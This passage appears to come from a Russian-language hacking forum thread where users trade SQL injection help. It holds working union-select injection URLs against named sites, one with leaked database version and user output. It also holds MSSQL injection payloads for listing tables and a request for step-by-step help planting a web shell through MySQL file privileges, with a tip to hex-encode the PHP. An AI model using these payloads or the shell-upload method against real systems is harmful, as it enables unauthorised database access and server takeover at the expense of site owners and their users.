http://www.reciprodate.com/home.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x7c,version(),user(),database()),22,23,24,25/* 4.0.27-standard|reciprodate@localhost|reciprodate
А такой вопрос. Сайт в локалке у нас...есть скуль Code: http://megaload.megalan.tv/program.php?id=3613%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20%20FROM%20INFORMATION_SCHEMA.TABLES%20-- отображает просто исходную страницу. количество полей подобрал по ошибкам, не версию, не бд не показывает. версия сто пудов 5ххх
игнорирует, исходную показывает. а если ошибку сделаю или не в то поле...тогда показывает что ошибка.
1. Попробуй: Code: http://megaload.megalan.tv/program.php?id=-3613+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 2. Возможно, там просто нету вывода.
Помогите, пожалуйста, с заливкой шелла. Есть сайт на дедике, на дедике установлена Windows Server 2003. Есть MySQL 4 версии, раскрученная. Есть путь вида: M:\Inetpub\vhosts\[SITE]\httpdocs\script.php - он выводится при ошибке скули. Есть привилегии типа File_Priv Будет неплохо, если набросаете хороших faq или статей. Те, что гуглил я не помогли. Желательно расписать очень подробно. с Linux только начинаю дружить. Заранее спасиб.
Basilio Потом переходишь на scr.php, и шелл копируется в shell.php p.s: php код лучше в hex перевести
а какой шелл лучше использовать (кинь линк), конфигурацию я написал. Просто те шеллы, которые выложены на milw0rm они вроде все написаны для консоли линуха. или я не прав?
лююддии help me Есть скуль на сайте база MSSQL ввожу index.cfm?page=search&searchstring[email protected]&searchtype=@@version или (select+system_user) все нормально выводит но как только пытаюсь вывести имена таблиц, (SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES) то просто открывается страница сайта, не каких ошибок и прочего если так (SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES)-- то ошибка Incorrect syntax near the keyword 'order'. В чем трабла? как вывести имена таблиц и колонок?